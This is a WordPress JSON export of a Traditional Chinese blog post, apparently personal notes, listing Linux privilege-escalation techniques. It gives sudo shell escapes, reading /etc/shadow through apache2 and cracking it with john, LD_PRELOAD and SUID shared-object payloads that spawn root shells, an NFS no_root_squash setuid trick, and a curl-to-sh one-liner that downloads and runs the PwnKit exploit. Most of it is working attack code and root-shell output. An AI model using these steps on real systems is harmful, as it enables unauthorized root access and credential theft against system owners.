class=\"wp-block-heading\">sudo\u63d0\u6b0a<\/h2>\n\n\n\n<p>\u666e\u901a\u7528\u6236\u4e00\u822c\u7121\u6cd5\u7528root\u547d\u4ee4\uff0c\u4f46\u4f7f\u7528sudo\u547d\u4ee4\u5f8c\u5c31\u53ef\u4ee5\u8b93\u666e\u901a\u7528\u6236\u80fd\u4ee5root\u6b0a\u9650\u57f7\u884croot\u547d\u4ee4\u3002\u6709\u6642\u5019\u9ed1\u5ba2\u62ff\u5230\u9ad8\u6b0a\u9650\u5f8c\u4e5f\u6703\u5229\u7528sudo\u4f86\u5efa\u7acb\u5f8c\u9580<\/p>\n\n\n\n<p>Linux\u63d0\u6743\u59ff\u52bf\u4e00\uff1a\u6ee5\u7528SUDO\u63d0\u6743 :https:\/\/cloud.tencent.com\/developer\/article\/1708368<br>POC\/EXP: https:\/\/developer.aliyun.com\/article\/654362<br>\u4e94\u79cd\u5b9e\u7528\u578blinux\u63d0\u6743\u65b9\u6cd5 https:\/\/www.wangan.com\/p\/7fy747408cfd6254<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Sudo (Shell Escape Sequences)<\/h3>\n\n\n\n<p><code>sudo -l <\/code>\u5982\u679c\u986f\u793afind,awk,nmap,vim \u53ef\u7528\uff0c\u53ef\u7528\u4ee5\u4e0b\u65b9\u5f0f\u53d6\u5f97shell<\/p>\n\n\n\n<p><code>sudo find \/bin -name nano -exec \/bin\/sh \\;<\/code><\/p>\n\n\n\n<p><code>sudo awk 'BEGIN {system(\"\/bin\/sh\")}'<\/code><\/p>\n\n\n\n<p><code>echo \"os.execute('\/bin\/sh')\" &gt; shell.nse &amp;&amp; sudo nmap --script=shell.nse<\/code><\/p>\n\n\n\n<p><code>sudo vim -c '!sh'<\/code><\/p>\n\n\n\n<p>\u5176\u4ed6\u5229\u7528\u73fe\u6709\u7684linux\u5408\u6cd5\u6307\u4ee4\u63d0\u6b0a\u7684\u65b9\u5f0f\u53ef\u53c3\u8003 <a href=\"https:\/\/gtfobins.github.io\" target=\"_blank\" rel=\"noopener\">https:\/\/gtfobins.github.io<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Sudo (Abusing Intended Functionality)<\/h3>\n\n\n\n<p>sudo -l \u5982\u679c\u986f\u793aapache2\u53ef\u4ee5\u7528\uff0c\u53ef\u7528\u4ee5\u4e0b\u65b9\u5f0f\u53d6\u5f97\u9ad8\u6b0a\u9650\u6a94\u6848<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># sudo apache2 -f \/etc\/shadow<\/code><\/pre>\n\n\n\n<p> \u57f7\u884c\u5f8c\u53ef\u53d6\u5f97root hash. \u63a5\u8457\u5206\u6790hash\uff0c\u6b65\u9a5f\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># echo '&#91;Pasted Root Hash]' &gt; hash.txt\n# john --wordlist=\/usr\/share\/wordlists\/nmap.lst hash.txt<\/code><\/pre>\n\n\n\n<p>\u6210\u529f\u7834\u89e3\u53ef\u770b\u5230root\u5bc6\u78bc <\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Sudo (LD_PRELOAD)<\/h3>\n\n\n\n<p>sudo -l \u5982\u679c\u986f\u793aLD_PRELOAD\uff0c\u53ef\u7528\u4ee5\u4e0b\u65b9\u5f0f\u53d6\u5f97\u9ad8\u6b0a\u9650\u6a94\u6848<\/p>\n\n\n\n<p>\u7de8\u8f2f\u4ee5\u4e0b\u5167\u5bb9\uff0c\u5132\u5b58\u70bax.c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#include &lt;stdio.h&gt;\n#include &lt;sys\/types.h&gt;\n#include &lt;stdlib.h&gt;\nvoid _init() {\n  unsetenv(\"LD_PRELOAD\");\n  setgid(0);\n  setuid(0);\n  system(\"\/bin\/bash\");\n}<\/code><\/pre>\n\n\n\n<p>\u57f7\u884cgcc\u6307\u4ee4\u4e26\u642d\u914d\u4ee5\u4e0b\u53c3\u6578<\/p>\n\n\n\n<p>\u2022 -fPIC\uff1a\u751f\u6210\u4f4d\u7f6e\u7121\u95dc\u4ee3\u78bc\uff0c\u9069\u7528\u65bc\u5171\u4eab\u5eab\u3002<\/p>\n\n\n\n<p>\u2022 -shared\uff1a\u751f\u6210\u5171\u4eab\u5eab\u3002<\/p>\n\n\n\n<p>\u2022 -nostartfiles\uff1a\u4e0d\u52a0\u8f09\u9ed8\u8a8d\u7684\u555f\u52d5\u6587\u4ef6\uff0c\u50c5\u5305\u542b\u5fc5\u8981\u7684\u4ee3\u78bc\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># gcc -fPIC -shared -o \/tmp\/x.so x.c -nostartfiles\n# sudo LD_PRELOAD=\/tmp\/x.so apache2\n$ id\nuid=0(root)<\/code><\/pre>\n\n\n\n<p>sudo \u4ee5 root \u6b0a\u9650\u904b\u884c apache2\u3002\u7531\u65bc\u8a2d\u7f6e\u4e86 LD_PRELOAD\uff0c\u7cfb\u7d71\u6703\u512a\u5148\u52a0\u8f09 \/tmp\/x.so\uff0c\u57f7\u884c _init \u51fd\u6578\u4e2d\u7684\u4ee3\u78bc\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">NFS<\/h2>\n\n\n\n<p><\/p>\n\n\n\n<p>\u7576\u5728 NFS \u4f3a\u670d\u5668\u7684\u5c0e\u51fa\u914d\u7f6e\u4e2d\u555f\u7528 no_root_squash \u6642\uff0c\u5ba2\u6236\u7aef\u7684 root \u7528\u6236\u5c07\u4fdd\u6301\u5176 root \u8eab\u4efd\uff0c\u4e26\u80fd\u4ee5 root \u6b0a\u9650\u8a2a\u554f NFS \u5171\u4eab\u4e0a\u7684\u6587\u4ef6\u548c\u76ee\u9304\u3002<\/p>\n\n\n\n<p>\u7528\u4ee5\u4e0b\u65b9\u5f0f\u53ef\u6aa2\u67e5\u76ee\u6a19\u4e3b\u6a5f\u662f\u5426\u6709<code>no_root_squash<\/code> <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># cat \/etc\/exports\n\/tmp *(rw,sync,no_root_squash)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>\u5047\u5982\u76ee\u6a19\u4e3b\u6a5f\u6709no_root_squash\uff0c\u53ef\u4ee5\u900f\u904e\u4ee5\u4e0b\u65b9\u5f0f\u63d0\u6b0a <\/p>\n\n\n\n<p>\u5148\u5728\u653b\u64ca\u4e3b\u6a5f\u57f7\u884c\u4ee5\u4e0b\u6307\u4ee4\uff0c\u5047\u8a2d\u76ee\u6a19\u4e3b\u6a5f\u70ba192.168.1.100<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># showmount -e 192.168.1.100\n# mkdir \/tmp\/1\n# mount -o rw,vers=2 192.168.1.100:\/tmp \/tmp\/1\n# echo 'int main() { setgid(0); setuid(0); system(\"\/bin\/bash\"); return 0; }' &gt; \/tmp\/1\/x.c\n# gcc \/tmp\/1\/x.c -o \/tmp\/1\/x\n# chmod +s \/tmp\/1\/x<\/code><\/pre>\n\n\n\n<p>\u5728\u76ee\u6a19\u4e3b\u6a5f192.168.1.100\u57f7\u884c\u4ee5\u4e0b\uff0c\u53ef\u6210\u529f\u63d0\u6b0a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># \/tmp\/x\n# id\nuid=0(root)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">CVE \u6f0f\u6d1e\u63d0\u6b0a<\/h2>\n\n\n\n<p><br>CVE(Common Vulnerabilities and Exposures)\u662f\u4e00\u500b\u6a19\u6e96\u5316\u7684\u6f0f\u6d1e\u7de8\u865f\u7cfb\u7d71\uff0c\u7528\u65bc\u552f\u4e00\u6a19\u8b58\u5df2\u77e5\u7684\u5b89\u5168\u6f0f\u6d1e\uff0cCVE \u8986\u84cb\u4e86\u591a\u7a2e\u985e\u578b\u7684\u6f0f\u6d1e\u3002\u5229\u7528CVE\u63d0\u6b0a\u7684\u4e00\u822c\u904e\u7a0b\uff0c\u901a\u5e38\u6703\u78ba\u8a8d\u76ee\u6a19\u7cfb\u7d71\u7684\u64cd\u4f5c\u7cfb\u7d71\u7248\u672c\u3001\u5167\u6838\u7248\u672c\u548c\u5df2\u5b89\u88dd\u7684\u61c9\u7528\u7a0b\u5e8f\u7248\u672c\uff0c\u5728\u7372\u53d6\u76f8\u5c0d\u61c9 Exploit\uff08\u6f0f\u6d1e\u5229\u7528\u4ee3\u78bc\uff09\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">CVE-2021-4034<\/h3>\n\n\n\n<p>\u4f7f\u7528 <code>rpm -qa polkit<\/code> \u6216 <code>dpkg -l polkit<\/code> \u7b49\u547d\u4ee4\u67e5\u8a62\u5df2\u5b89\u88dd\u7684\u8edf\u9ad4\u7248\u672c\uff0c\u767c\u73fe\u6709pwnkit\u6f0f\u6d1e\uff0cCVE-2021-4034<\/p>\n\n\n\n<p>\u5c31\u53ef\u4ee5\u4f7f\u7528\u4ee5\u4e0b\u65b9\u5f0f\u63d0\u6b0a <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ id\nuid=1000(user)...omit...\n$ sh -c \"$(curl -fsSL https:\/\/raw.githubusercontent.com\/ly4k\/PwnKit\/main\/PwnKit.sh)\"\n# id\nuid=0(root)...omit...<\/code><\/pre>\n\n\n\n<p>PwnKit.sh\u7684\u5167\u5bb9\u5982\u4e0b\uff0c\u7d30\u7bc0\u53ef\u53c3\u8003<code>https:\/\/github.com\/ly4k\/PwnKit<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>curl -fsSL https:\/\/raw.githubusercontent.com\/ly4k\/PwnKit\/main\/PwnKit -o PwnKit || exit\nchmod +x .\/PwnKit || exit\n(sleep 1 &amp;&amp; rm .\/PwnKit &amp; )\n.\/PwnKit<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u5176\u4ed6<\/h2>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">so Injection<\/h3>\n\n\n\n<p>\u5982\u679c\u6709\u767c\u73feSUID(Set User ID)\u6b0a\u9650\uff0c\u4f8b\u5982 <code>find \/ -type f -perm -4000 -ls 2&gt;\/dev\/null<\/code>\u767c\u73fe\u7684\u6a94\u6848\uff0c4000\u8868\u793aSUID\u6b0a\u9650<\/p>\n\n\n\n<p>\u5047\u5982<code>\/usr\/local\/bin\/suid-so<\/code>\u6709suid\uff0c\u5247\u4f7f\u7528 strace \u4f86\u8ddf\u8e64\u4e26\u986f\u793a\u7a0b\u5f0f\u57f7\u884c\u671f\u9593\u7684\u7cfb\u7d71\u8abf\u7528\uff0c\u7279\u5225\u95dc\u6ce8\u8207\u6a94\u6848\u64cd\u4f5c\u76f8\u95dc\u7684\u7cfb\u7d71\u8abf\u7528\uff08\u4f8b\u5982\u6253\u958b\u6a94\u6848\u3001\u8a2a\u554f\u6a94\u6848\u7b49\uff09<\/p>\n\n\n\n<p><code>#strace \/usr\/local\/bin\/suid-so 2&gt;&amp;1 | grep -i -E \"open|access|no such file\"<\/code><\/p>\n\n\n\n<p>\u5047\u8a2d\u57f7\u884c\u6642\u9593\u6703\u8f09\u5165\u4e00\u500b\u7279\u5b9a\u8def\u5f91\u4e0b\u7684\u5171\u7528\u7a0b\u5f0f\u5eab\uff08\u4f8b\u5982 \/tmp\/libcalc.so\uff09\uff0c\u4f46\u6c92\u6709\u5c0d\u9019\u500b\u8def\u5f91\u9032\u884c\u56b4\u683c\u7684\u6b0a\u9650\u6aa2\u67e5\u3002\u6216\u662f\u7a0b\u5f0f\u5617\u8a66\u5f9e\u4e00\u500b\u53ef\u5beb\u76ee\u9304\u8f09\u5165 .so \u6587\u4ef6\uff0c\u4e26\u4e14\u8a72\u6587\u4ef6\u907a\u5931\u6216\u4e0d\u5b58\u5728\u3002\u5c31\u53ef\u4f7f\u7528\u4ee5\u4e0b\u65b9\u5f0f\u63d0\u6b0a<\/p>\n\n\n\n<p>1.\u88fd\u505a\u4e00\u500b\/tmp\/libcalc.c\u5167\u5bb9\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#include &lt;stdio.h&gt; \n#include &lt;stdlib.h&gt; \nstatic void inject() __attribute__((constructor)); \nvoid inject() { \nsystem(\"cp \/bin\/bash \/tmp\/bash &amp;&amp; chmod +s \/tmp\/bash &amp;&amp; \/tmp\/bash -p\"); \n} <\/code><\/pre>\n\n\n\n<p>2.\u57f7\u884c\u4ee5\u4e0b\u5167\u5bb9\u7522\u751f\u6240\u7f3a\u5c11\u7684\/tmp\/libcalc.so<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># gcc -shared -o \/tmp\/libcalc.so -fPIC \/tmp\/libcalc.c\n# \/usr\/local\/bin\/suid-so \n$ id\nuid=0(root)...omit...<\/code><\/pre>\n\n\n\n<p>\u4e00\u65e6\u57f7\u884csuid-so \u5c31\u6703\u8b80\u53d6\u5047\u7684libcalc.so\u5167\u7684\u6307\u4ee4\uff0c\u4ee5root\u8eab\u4efd\u555f\u7528bash<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Linux\u63d0\u6b0a\u662f\u6307\u5c07\u666e\u901a\u7528\u6236\u7684\u6b0a\u9650\u63d0\u5347\u81f3\u66f4\u9ad8\u6b0a\u9650\u7684\u904e\u7a0b\uff0c\u5e38\u898b\u65b9\u6cd5\u5305\u62ec\u4f7f\u7528Cron\u3001\u5bc6\u78bc\u6316\u6398\u3001\u74b0\u5883\u8b8a\u91cf\u3001SUID\u3001SUDO\u3001NFS\u548cCVE\u6f0f\u6d1e\u7b49\u3002\u9019\u4e9b\u65b9\u6cd5\u5747\u53ef\u5354\u52a9\u653b\u64ca\u8005\u7372\u53d6\u5c0d\u7cfb\u7d71\u7684\u63a7\u5236\u6b0a\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[368],"tags":[],"class_list":["post-1738","post","type-post","status-publish","format-standard","hentry","category-operations"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1738","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1738"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1738\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1738"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1738"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1738"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}